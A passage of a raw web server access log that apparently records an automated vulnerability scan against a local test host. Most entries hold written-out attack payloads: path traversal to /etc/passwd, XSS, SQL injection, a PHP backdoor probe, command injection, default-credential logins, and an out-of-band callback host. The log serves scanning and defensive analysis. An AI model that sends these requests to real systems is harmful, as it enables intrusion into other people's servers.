30213782780204a9f032b--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /./RestAPI/LogonCustomization HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:37:59 +0000","request_body":"methodToCall=openSSLTool&action=generateCSR&KEY_LENGTH=1024+-providerclass+Si+-providerpath+%22..%5Cbin%22","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /./RestAPI/Connection HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:37:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /help/admin-guide/test.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:37:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /install/page_start.php HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"5.000","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:37:59 +0000","request_body":"{\x0D\x0A \x22user\x22: {\x0D\x0A \x22$func\x22: \x22var_dump\x22\x0D\x0A }\x0D\x0A}\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /auth/requestreset HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:37:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_extplorer&action=show_error&dir=..%2F..%2F..%2F%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:37:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:37:59 +0000","request_body":"username=admin&password=gophish&csrf_token={{replace(url_encode(html_unescape(csrf_token)), \x22+\x22, \x22%2B\x22)}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:37:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webadmin/reporter/view_server_log.php?server=localhost&act=stats&filename=&offset=1&count=1000&sortorder=&log=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&offset=&sortitem=&filter= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:37:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/iwp-client/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:37:59 +0000","request_body":"{\x22id\x22:1,\x22jsonrpc\x22:\x222.0\x22,\x22params\x22:{\x22token\x22: \x22Test\x22},\x22method\x22:\x22web.LoginSTS\x22}","remote_addr":"192.168.144.1","http_host":"c9v8ia8smpv8c8qg07h0mdrhsauanf8js.oast.me","request":"POST /minio/webrpc HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:37:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /carbon/admin/login.jsp?loginStatus=false&errorCode=%27);alert(document.domain)// HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"5.001","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:37:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"5.004","http_user_agent":"zerodiumvar_dump(233*233);", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:37:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.1.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.178","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:37:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc....4.2.1....json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:37:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /OA_HTML/oksAutoRenewalHelp.jsp%3Fthanks%3D%27%22%3E%3Csvg%2Fonload%3Dalert('297MksUA78Tc0pCvZ15P2WotwAJ')%3E HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"5.001","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:37:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?api=%27%3E%22%3Csvg%2Fonload=confirm%28%27api%27%29%3E&api_key=%27%3E%22%3Csvg%2Fonload=confirm%28%27api_key%27%29%3E&begindate=%27%3E%22%3Csvg%2Fonload=confirm%28%27begindate%27%29%3E&callback=%27%3E%22%3Csvg%2Fonload=confirm%28%27callback%27%29%3E&categoryid=%27%3E%22%3Csvg%2Fonload=confirm%28%27categoryid%27%29%3E&csrf_token=%27%3E%22%3Csvg%2Fonload=confirm%28%27csrf_token%27%29%3E&email=%27%3E%22%3Csvg%2Fonload=confirm%28%27email%27%29%3E&emailto=%27%3E%22%3Csvg%2Fonload=confirm%28%27emailto%27%29%3E&enddate=%27%3E%22%3Csvg%2Fonload=confirm%28%27enddate%27%29%3E&immagine=%27%3E%22%3Csvg%2Fonload=confirm%28%27immagine%27%29%3E&item=%27%3E%22%3Csvg%2Fonload=confirm%28%27item%27%29%3E&jsonp=%27%3E%22%3Csvg%2Fonload=confirm%28%27jsonp%27%29%3E&l=%27%3E%22%3Csvg%2Fonload=confirm%28%27l%27%29%3E&lang=%27%3E%22%3Csvg%2Fonload=confirm%28%27lang%27%29%3E&list_type=%27%3E%22%3Csvg%2Fonload=confirm%28%27list_type%27%29%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.179","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:37:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /favicon.ico HTTP/1.1","status":"200","body_bytes_sents":"4286","req_time":"1.176","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.json?FNZ.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?month=%27%3E%22%3Csvg%2Fonload=confirm%28%27month%27%29%3E&page_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27page_id%27%29%3E&password=%27%3E%22%3Csvg%2Fonload=confirm%28%27password%27%29%3E&terms=%27%3E%22%3Csvg%2Fonload=confirm%28%27terms%27%29%3E&token=%27%3E%22%3Csvg%2Fonload=confirm%28%27token%27%29%3E&type=%27%3E%22%3Csvg%2Fonload=confirm%28%27type%27%29%3E&unsubscribe_token=%27%3E%22%3Csvg%2Fonload=confirm%28%27unsubscribe_token%27%29%3E&year=%27%3E%22%3Csvg%2Fonload=confirm%28%27year%27%29%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /stat.jsp?cmd=chcp+437+%7c+dir HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.json?FNZ.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:00 +0000","request_body":"action=wpcf7r_get_nonce¶m=wp_rest","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-admin/admin-ajax.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /img.php?f=/./etc/./passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.174","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tcpconfig.html HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"5.003","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.vm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.json?FNZ.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /user.php?act=login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:\x22num\x22;s:72:\x220,1 procedure analyse(extractvalue(rand(),concat(0x7e,version())),1)-- -\x22;s:2:\x22id\x22;i:1;}", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:00 +0000","request_body":"@\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /_bulk HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ssoAdapter/logoutAction.do?servProvCode=SAFVC&successURL=https://example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.json/FNZ.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /am/UI/Login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.179","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tiki-login_scr.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugins/address_add/add.php?first=HOVER%20ME!%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.174","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /scripts/wa.exe?OK=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /common/download/resource?resource=/profile/../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.181","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /am/UI/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tiki-login.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:00 +0000","request_body":"username=admin%27+or+%271%27+%3D+%271%27%3B+--+-&password=A&login=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /dfsms/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Audio/1/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /common/download/resource?resource=/profile/../../../../Windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /am/XUI/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:00 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /global-protect/login.esp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/debug.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /am/XUI/Login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=woo_ce&failed=1&message=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/users/search_authors HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /names.nsf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /labkey/__r1/login-login.view?returnUrl=http://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /am/json/serverinfo/* HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /minio/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /openam/json/serverinfo/* HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_ignition/scripts/--%3E%3Csvg%20onload=alert%28document.domain%29%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /oam/server/opensso/sessionservice HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /templates/m/inc_head.php?q=%22%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/swipehq-payment-gateway-woocommerce/test-plugin.php?api_url=api_url%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": 